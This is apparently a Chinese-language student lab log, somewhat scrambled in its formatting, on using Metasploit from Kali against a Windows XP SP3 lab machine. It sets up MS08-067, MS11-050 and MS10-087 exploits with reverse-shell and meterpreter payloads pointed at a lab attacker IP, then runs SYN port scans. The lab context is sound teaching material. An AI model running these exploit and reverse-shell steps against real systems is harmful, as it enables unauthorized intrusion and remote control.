Kali
win XP SP3(English)
msfconsole
search ms08_067
,查找相應的漏洞help
來查找use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
meterpreter
,找到相應的payload並設置便可show options
set LHOST 192.168.42.133 //設置攻擊IP set RHOST 192.168.42.222 //設置靶機IP
show targets
set target 0
exploit
use windows/browser/ms11_050_mshtml_cobjectelement
info
指令查看模塊詳細信息
set payload windows/meterpreter/reverese_http
meterpreter
方式獲取權限show options
查看
set URIPATH ms5221 //設置訪問主頁的URI set LHOST 192.168.42.133 //設置攻擊IP set LPORT 8443 //設置攻擊端口
exploit
http://192.168.42.133:8080/ms5221
;
sessions -i 3
sysinfo
use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
set payload windows/exec
show options
查看
set FILENAME 20145221.rft //設置生成文件rtf set CMD notepad.exe //綁定記事本執行
exploit
/root/.msf4/local/20145221.rft
拷貝到靶機上,並把格式修改成.doc
cp
命令,成功將文件拷貝出來msfconsle
後,經過下面相關指令查找輔助模塊
show auxiliary
ack:經過ACK掃描的方式對防火牆上未被屏蔽的端口進行探測; ftpbounce:經過FTP BOUNCE攻擊的原理對TCP服務進行枚舉 syn:使用發送TCP SYN標誌的方式探測開放的端口 tcp:經過一次完整的TCP連接來判斷端口是否開放 xmas:一種更爲隱蔽的掃描方式,經過發送FIN,PSH,URG標誌可以躲避一些TCP標記檢測器的過濾
use auxiliary/scanner/portscan/syn
show options
來查看
set RHOSTS 192.168.42.222 //設置掃描目標IP地址 set THREADS 50 //設置線程數
run
,掃描結果以下:
msf
下用nmap的相關指令,對目標主機進行掃描:
經過觀察不難發現,掃描速度更快,而且對每種端口的做用也有了個說明,能弄清楚每一個端口是幹嗎的html